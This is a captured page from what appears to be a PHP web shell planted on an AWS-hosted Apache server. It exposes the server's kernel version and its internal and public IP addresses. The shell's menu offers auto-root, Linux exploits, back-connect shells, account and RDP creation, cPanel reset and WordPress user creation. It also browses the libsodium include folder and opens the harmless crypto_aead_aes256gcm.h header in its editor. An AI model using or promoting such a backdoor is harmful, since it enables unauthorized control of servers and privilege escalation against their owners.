Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.143.254.11
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
sodium /
[ HOME SHELL ]
Name
Size
Permission
Action
core.h
391
B
-rw-r--r--
crypto_aead_aes256gcm.h
7.79
KB
-rw-r--r--
crypto_aead_chacha20poly1305.h
8.58
KB
-rw-r--r--
crypto_aead_xchacha20poly1305....
4.73
KB
-rw-r--r--
crypto_auth.h
1.12
KB
-rw-r--r--
crypto_auth_hmacsha256.h
2.09
KB
-rw-r--r--
crypto_auth_hmacsha512.h
2.07
KB
-rw-r--r--
crypto_auth_hmacsha512256.h
2.08
KB
-rw-r--r--
crypto_box.h
6.68
KB
-rw-r--r--
crypto_box_curve25519xchacha20...
7.77
KB
-rw-r--r--
crypto_box_curve25519xsalsa20p...
4.59
KB
-rw-r--r--
crypto_core_ed25519.h
2.83
KB
-rw-r--r--
crypto_core_hchacha20.h
816
B
-rw-r--r--
crypto_core_hsalsa20.h
804
B
-rw-r--r--
crypto_core_ristretto255.h
3.07
KB
-rw-r--r--
crypto_core_salsa20.h
792
B
-rw-r--r--
crypto_core_salsa2012.h
816
B
-rw-r--r--
crypto_core_salsa208.h
968
B
-rw-r--r--
crypto_generichash.h
2.44
KB
-rw-r--r--
crypto_generichash_blake2b.h
3.87
KB
-rw-r--r--
crypto_hash.h
901
B
-rw-r--r--
crypto_hash_sha256.h
1.46
KB
-rw-r--r--
crypto_hash_sha512.h
1.46
KB
-rw-r--r--
crypto_kdf.h
1.28
KB
-rw-r--r--
crypto_kdf_blake2b.h
1.05
KB
-rw-r--r--
crypto_kx.h
2.15
KB
-rw-r--r--
crypto_onetimeauth.h
1.87
KB
-rw-r--r--
crypto_onetimeauth_poly1305.h
2.15
KB
-rw-r--r--
crypto_pwhash.h
4.85
KB
-rw-r--r--
crypto_pwhash_argon2i.h
3.83
KB
-rw-r--r--
crypto_pwhash_argon2id.h
3.89
KB
-rw-r--r--
crypto_pwhash_scryptsalsa208sh...
4.58
KB
-rw-r--r--
crypto_scalarmult.h
1.16
KB
-rw-r--r--
crypto_scalarmult_curve25519.h
1.07
KB
-rw-r--r--
crypto_scalarmult_ed25519.h
1.37
KB
-rw-r--r--
crypto_scalarmult_ristretto255...
1.09
KB
-rw-r--r--
crypto_secretbox.h
3.24
KB
-rw-r--r--
crypto_secretbox_xchacha20poly...
2.79
KB
-rw-r--r--
crypto_secretbox_xsalsa20poly1...
2.36
KB
-rw-r--r--
crypto_secretstream_xchacha20p...
3.74
KB
-rw-r--r--
crypto_shorthash.h
960
B
-rw-r--r--
crypto_shorthash_siphash24.h
1.21
KB
-rw-r--r--
crypto_sign.h
3.27
KB
-rw-r--r--
crypto_sign_ed25519.h
4.24
KB
-rw-r--r--
crypto_sign_edwards25519sha512...
2
KB
-rw-r--r--
crypto_stream.h
1.57
KB
-rw-r--r--
crypto_stream_chacha20.h
3.59
KB
-rw-r--r--
crypto_stream_salsa20.h
1.79
KB
-rw-r--r--
crypto_stream_salsa2012.h
1.5
KB
-rw-r--r--
crypto_stream_salsa208.h
1.69
KB
-rw-r--r--
crypto_stream_xchacha20.h
1.83
KB
-rw-r--r--
crypto_stream_xsalsa20.h
1.81
KB
-rw-r--r--
crypto_verify_16.h
419
B
-rw-r--r--
crypto_verify_32.h
419
B
-rw-r--r--
crypto_verify_64.h
419
B
-rw-r--r--
export.h
1.32
KB
-rw-r--r--
randombytes.h
1.8
KB
-rw-r--r--
randombytes_internal_random.h
427
B
-rw-r--r--
randombytes_sysrandom.h
282
B
-rw-r--r--
runtime.h
889
B
-rw-r--r--
utils.h
6
KB
-rw-r--r--
version.h
509
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : crypto_aead_aes256gcm.h
#ifndef crypto_aead_aes256gcm_H #define crypto_aead_aes256gcm_H /* * WARNING: Despite being the most popular AEAD construction due to its * use in TLS, safely using AES-GCM in a different context is tricky. * * No more than ~ 350 GB of input data should be encrypted with a given key. * This is for ~ 16 KB messages -- Actual figures vary according to * message sizes. * * In addition, nonces are short and repeated nonces would totally destroy * the security of this scheme. * * Nonces should thus come from atomic counters, which can be difficult to * set up in a distributed environment. * * Unless you absolutely need AES-GCM, use crypto_aead_xchacha20poly1305_ietf_*() * instead. It doesn't have any of these limitations. * Or, if you don't need to authenticate additional data, just stick to * crypto_secretbox(). */ #include <stddef.h> #include "export.h" #ifdef __cplusplus # ifdef __GNUC__ # pragma GCC diagnostic ignored "-Wlong-long" # endif extern "C" { #endif SODIUM_EXPORT int crypto_aead_aes256gcm_is_available(void); #define crypto_aead_aes256gcm_KEYBYTES 32U SODIUM_EXPORT size_t crypto_aead_aes256gcm_keybytes(void); #define crypto_aead_aes256gcm_NSECBYTES 0U SODIUM_EXPORT size_t crypto_aead_aes256gcm_nsecbytes(void); #define crypto_aead_aes256gcm_NPUBBYTES 12U SODIUM_EXPORT size_t crypto_aead_aes256gcm_npubbytes(void); #define crypto_aead_aes256gcm_ABYTES 16U SODIUM_EXPORT size_t crypto_aead_aes256gcm_abytes(void); #define crypto_aead_aes256gcm_MESSAGEBYTES_MAX \ SODIUM_MIN(SODIUM_SIZE_MAX - crypto_aead_aes256gcm_ABYTES, \ (16ULL * ((1ULL << 32) - 2ULL))) SODIUM_EXPORT size_t crypto_aead_aes256gcm_messagebytes_max(void); typedef struct CRYPTO_ALIGN(16) crypto_aead_aes256gcm_state_ { unsigned char opaque[512]; } crypto_aead_aes256gcm_state; SODIUM_EXPORT size_t crypto_aead_aes256gcm_statebytes(void); SODIUM_EXPORT int crypto_aead_aes256gcm_encrypt(unsigned char *c, unsigned long long *clen_p, const unsigned char *m, unsigned long long mlen, const unsigned char *ad, unsigned long long adlen, const unsigned char *nsec, const unsigned char *npub, const unsigned char *k) __attribute__ ((nonnull(1, 8, 9))); SODIUM_EXPORT int crypto_aead_aes256gcm_decrypt(unsigned char *m, unsigned long long *mlen_p, unsigned char *nsec, const unsigned char *c, unsigned long long clen, const unsigned char *ad, unsigned long long adlen, const unsigned char *npub, const unsigned char *k) __attribute__ ((warn_unused_result)) __attribute__ ((nonnull(4, 8, 9))); SODIUM_EXPORT int crypto_aead_aes256gcm_encrypt_detached(unsigned char *c, unsigned char *mac, unsigned long long *maclen_p, const unsigned char *m, unsigned long long mlen, const unsigned char *ad, unsigned long long adlen, const unsigned char *nsec, const unsigned char *npub, const unsigned char *k) __attribute__ ((nonnull(1, 2, 9, 10))); SODIUM_EXPORT int crypto_aead_aes256gcm_decrypt_detached(unsigned char *m, unsigned char *nsec, const unsigned char *c, unsigned long long clen, const unsigned char *mac, const unsigned char *ad, unsigned long long adlen, const unsigned char *npub, const unsigned char *k) __attribute__ ((warn_unused_result)) __attribute__ ((nonnull(3, 5, 8, 9))); /* -- Precomputation interface -- */ SODIUM_EXPORT int crypto_aead_aes256gcm_beforenm(crypto_aead_aes256gcm_state *ctx_, const unsigned char *k) __attribute__ ((nonnull)); SODIUM_EXPORT int crypto_aead_aes256gcm_encrypt_afternm(unsigned char *c, unsigned long long *clen_p, const unsigned char *m, unsigned long long mlen, const unsigned char *ad, unsigned long long adlen, const unsigned char *nsec, const unsigned char *npub, const crypto_aead_aes256gcm_state *ctx_) __attribute__ ((nonnull(1, 8, 9))); SODIUM_EXPORT int crypto_aead_aes256gcm_decrypt_afternm(unsigned char *m, unsigned long long *mlen_p, unsigned char *nsec, const unsigned char *c, unsigned long long clen, const unsigned char *ad, unsigned long long adlen, const unsigned char *npub, const crypto_aead_aes256gcm_state *ctx_) __attribute__ ((warn_unused_result)) __attribute__ ((nonnull(4, 8, 9))); SODIUM_EXPORT int crypto_aead_aes256gcm_encrypt_detached_afternm(unsigned char *c, unsigned char *mac, unsigned long long *maclen_p, const unsigned char *m, unsigned long long mlen, const unsigned char *ad, unsigned long long adlen, const unsigned char *nsec, const unsigned char *npub, const crypto_aead_aes256gcm_state *ctx_) __attribute__ ((nonnull(1, 2, 9, 10))); SODIUM_EXPORT int crypto_aead_aes256gcm_decrypt_detached_afternm(unsigned char *m, unsigned char *nsec, const unsigned char *c, unsigned long long clen, const unsigned char *mac, const unsigned char *ad, unsigned long long adlen, const unsigned char *npub, const crypto_aead_aes256gcm_state *ctx_) __attribute__ ((warn_unused_result)) __attribute__ ((nonnull(3, 5, 8, 9))); SODIUM_EXPORT void crypto_aead_aes256gcm_keygen(unsigned char k[crypto_aead_aes256gcm_KEYBYTES]) __attribute__ ((nonnull)); #ifdef __cplusplus } #endif #endif
Close